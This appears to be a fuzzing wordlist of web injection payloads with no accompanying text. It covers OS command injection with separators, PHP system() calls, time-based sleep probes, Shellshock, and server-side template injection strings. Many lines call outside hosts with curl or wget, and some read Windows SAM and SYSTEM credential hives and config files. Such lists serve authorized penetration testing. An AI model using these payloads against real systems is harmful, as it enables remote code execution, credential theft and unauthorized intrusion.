{${sleep(20)}} {${sleep(3)}} {${sleep(3)}} | sleep 5 ; sleep 5 & sleep 5 && sleep 5 sleep 5 {${sleep(hexdec(dechex(20)))}} {${sleep(hexdec(dechex(20)))}} sysinfo | sysinfo ; sysinfo & sysinfo && sysinfo system('cat C:\boot.ini'); system('cat config.php'); || system('curl https://crowdshield.com/.testing/rce_vuln.txt'); | system('curl https://crowdshield.com/.testing/rce_vuln.txt'); ; system('curl https://crowdshield.com/.testing/rce_vuln.txt'); & system('curl https://crowdshield.com/.testing/rce_vuln.txt'); && system('curl https://crowdshield.com/.testing/rce_vuln.txt'); system('curl https://crowdshield.com/.testing/rce_vuln.txt') system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf') system('curl https://xerosecurity.com/.testing/rce_vuln.txt'); system('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') systeminfo | systeminfo ; systeminfo & systeminfo && systeminfo system('ls') system('pwd') system('pwd'); || system('sleep 5'); | system('sleep 5'); ; system('sleep 5'); & system('sleep 5'); && system('sleep 5'); system('sleep 5') system('sleep 5'); system('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23') system('wget https://xerosecurity.com/.testing/rce_vuln.txt'); system('whoami') system('whoami'); test*; ls -lhtR /var/www/ test* || perl -e 'print "X"x16096' test* | perl -e 'print "X"x16096' test* & perl -e 'print "X"x16096' test* && perl -e 'print "X"x16096' test*; perl -e 'print "X"x16096' $(`type C:\boot.ini`) &&type C:\\boot.ini | type C:\Windows\repair\SAM ; type C:\Windows\repair\SAM & type C:\Windows\repair\SAM && type C:\Windows\repair\SAM type C:\Windows\repair\SAM | type C:\Windows\repair\SYSTEM ; type C:\Windows\repair\SYSTEM & type C:\Windows\repair\SYSTEM && type C:\Windows\repair\SYSTEM type C:\Windows\repair\SYSTEM | type C:\WINNT\repair\SAM ; type C:\WINNT\repair\SAM & type C:\WINNT\repair\SAM && type C:\WINNT\repair\SAM type C:\WINNT\repair\SAM type C:\WINNT\repair\SYSTEM | type %SYSTEMROOT%\repair\SAM ; type %SYSTEMROOT%\repair\SAM & type %SYSTEMROOT%\repair\SAM && type %SYSTEMROOT%\repair\SAM type %SYSTEMROOT%\repair\SAM | type %SYSTEMROOT%\repair\SYSTEM ; type %SYSTEMROOT%\repair\SYSTEM & type %SYSTEMROOT%\repair\SYSTEM && type %SYSTEMROOT%\repair\SYSTEM type %SYSTEMROOT%\repair\SYSTEM uname ;uname; | uname -a ; uname -a & uname -a && uname -a uname -a |/usr/bin/id ;|/usr/bin/id| ;/usr/bin/id| $;/usr/bin/id () { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\");' () { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11 | wget http://crowdshield.com/.testing/rce.txt & wget http://crowdshield.com/.testing/rce.txt ; wget https://crowdshield.com/.testing/rce_vuln.txt $(`wget https://crowdshield.com/.testing/rce_vuln.txt`) && wget https://crowdshield.com/.testing/rce_vuln.txt wget https://crowdshield.com/.testing/rce_vuln.txt $(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`) which curl which gcc which nc which netcat which perl which python which wget whoami | whoami ; whoami ' whoami ' || whoami ' & whoami ' && whoami '; whoami " whoami " || whoami " | whoami " & whoami " && whoami "; whoami $(`whoami`) & whoami && whoami {{ get_user_file("C:\boot.ini") }} {{ get_user_file("/etc/hosts") }} {{4+4}} {{4+8}} {{person.secret}} {{person.name}} {1} + {1} {% For c in [1,2,3]%} {{c, c, c}} {% endfor%} {{[] .__ Class __.__ base __.__ subclasses __ ()}}